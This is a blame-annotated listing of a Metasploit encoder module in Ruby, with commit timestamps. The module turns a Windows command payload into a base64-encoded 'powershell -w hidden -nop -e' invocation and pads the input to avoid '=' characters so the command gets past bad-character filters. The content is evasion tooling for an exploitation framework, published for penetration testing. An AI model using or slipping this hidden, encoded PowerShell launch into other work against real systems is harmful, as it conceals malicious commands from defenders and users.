2014-02-08 19:09:57 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2014-02-08 19:09:57 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
|
##
|
|
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Encoder
|
|
|
|
|
Rank = ExcellentRanking
|
|
|
|
|
|
|
|
|
|
def initialize
|
|
|
|
|
super(
|
|
|
|
|
'Name' => 'Powershell Base64 Command Encoder',
|
|
|
|
|
'Description' => %q{
|
|
|
|
|
This encodes the command as a base64 encoded command for powershell.
|
|
|
|
|
},
|
|
|
|
|
'Author' => 'Ben Campbell',
|
|
|
|
|
'Arch' => ARCH_CMD,
|
|
|
|
|
'Platform' => 'win')
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
#
|
|
|
|
|
# Encodes the payload
|
|
|
|
|
#
|
|
|
|
|
def encode_block(state, buf)
|
|
|
|
|
|
|
|
|
|
# Skip encoding for empty badchars
|
|
|
|
|
if state.badchars.length == 0
|
|
|
|
|
return buf
|
|
|
|
|
end
|
|
|
|
|
|
2014-02-08 19:16:42 +00:00
|
|
|
if (state.badchars.include? '-') || (state.badchars.include? ' ')
|
2014-02-08 19:09:57 +00:00
|
|
|
return buf
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
cmd = encode_buf(buf)
|
|
|
|
|
|
|
|
|
|
if state.badchars.include? '='
|
|
|
|
|
while cmd.include? '='
|
|
|
|
|
buf << " "
|
|
|
|
|
cmd = encode_buf(buf)
|
|
|
|
|
end
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
cmd
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def encode_buf(buf)
|
2014-02-10 23:15:59 +00:00
|
|
|
base64 = Rex::Text.encode_base64(Rex::Text.to_unicode("cmd.exe /c start #{buf}"))
|
2014-02-08 19:29:01 +00:00
|
|
|
cmd = "powershell -w hidden -nop -e #{base64}"
|
2014-02-08 19:09:57 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
end
|
